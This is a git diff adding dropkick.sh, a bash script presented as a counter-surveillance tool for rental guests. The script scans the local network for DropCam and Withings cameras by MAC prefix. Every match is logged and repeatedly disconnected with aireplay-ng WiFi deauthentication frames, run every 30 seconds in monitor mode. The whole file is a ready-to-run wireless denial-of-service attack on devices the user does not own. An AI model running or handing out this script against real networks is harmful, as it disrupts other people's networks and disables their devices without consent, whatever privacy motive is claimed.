diff options
Diffstat (limited to 'dropkick.sh')
-rwxr-xr-x | dropkick.sh | 66 |
1 files changed, 66 insertions, 0 deletions
diff --git a/dropkick.sh b/dropkick.sh new file mode 100755 index 0000000..ddda1bd --- /dev/null +++ b/dropkick.sh @@ -0,0 +1,66 @@ +#!/bin/bash +# +# DROPKICK.SH +# +# Detect and Disconnect the DropCam and Withings devices some people are using to +# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: +# +# http://julianoliver.com/output/log_2014-05-30_20-52 +# +# This script was named by Adam Harvey (http://ahprojects.com), who also +# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, +# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio +# notification. Comment it out if you don't need it. +# +# See also http://plugunplug.net, for a plug-and-play device that does this +# based on OpenWrt. Code here: +# +# https://github.com/JulianOliver/CyborgUnplug +# +# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows: +# +# sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> + +shopt -s nocasematch # Set shell to ignore case +shopt -s extglob # For non-interactive shell. + +readonly NIC=$1 # Your wireless NIC +readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) +readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') +# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not +# present. +readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings +readonly POLL=30 # Check every 30 seconds +readonly LOG=/var/log/dropkick.log + +airmon-ng stop mon0 # Pull down any lingering monitor devices +airmon-ng start $NIC # Start a monitor device + +while true; + do + for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ + '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') + do + if [[ "$TARGET" == "$GGMAC" ]] + then + # Audio alert + beep -f 1000 -l 500 -n 200 -r 2 + echo "WiFi camera discovered: "$TARGET >> $LOG + aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 + echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG + echo ' + __ __ _ __ __ + ___/ /______ ___ / /__ (_)___/ /_____ ___/ / + / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / + \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ + /_/ + + ' + else + echo $TARGET": is not a DropCam or Withings device. Leaving alone.." + fi + done + echo "None found this round." + sleep $POLL +done +airmon-ng stop mon0 |